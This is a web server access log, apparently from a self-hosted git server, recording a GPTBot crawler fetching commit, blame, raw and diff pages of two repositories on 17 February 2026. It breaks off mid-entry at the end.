git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10830] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" -[17/Feb/2026:13:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" -[17/Feb/2026:13:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" -[17/Feb/2026:13:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" -[17/Feb/2026:13:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" -[17/Feb/2026:13:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10184] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 37081] [Gzip 24.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42720] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" -[17/Feb/2026:13:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977.patch" [Client 74.7.227.38] [Length 237658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977.diff" [Client 74.7.227.38] [Length 235614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 10419] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15903] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" -[17/Feb/2026:13:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14659] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 7497] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746.diff" [Client 74.7.227.38] [Length 698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" [Client 74.7.227.38] [Length 10331] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" -[17/Feb/2026:13:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 10030] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 37117] [Gzip 24.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" [Client 74.7.227.38] [Length 11547] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 14560] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" -[17/Feb/2026:13:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129.diff" [Client 74.7.227.38] [Length 1557] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 10900] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 12903] [Gzip 6.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" -[17/Feb/2026:13:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14561] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" -[17/Feb/2026:13:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" -[17/Feb/2026:13:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 10780] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff" [Client 74.7.227.38] [Length 6541922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build" [Client 74.7.227.38] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10867] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" [Client 74.7.227.38] [Length 10071] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:13:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" [Client 74.7.227.38] [Length 14396] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:13:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 14384] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:13:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10215] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29874] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.diff" [Client 74.7.227.38] [Length 397105] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" -[17/Feb/2026:13:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services" -[17/Feb/2026:13:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build" [Client 74.7.227.38] [Length 10164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build" -[17/Feb/2026:13:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10430] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" [Client 74.7.227.38] [Length 10086] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" -[17/Feb/2026:13:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11517] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12780] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11643] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 11340] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" [Client 74.7.227.38] [Length 10821] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:27 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 13283] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 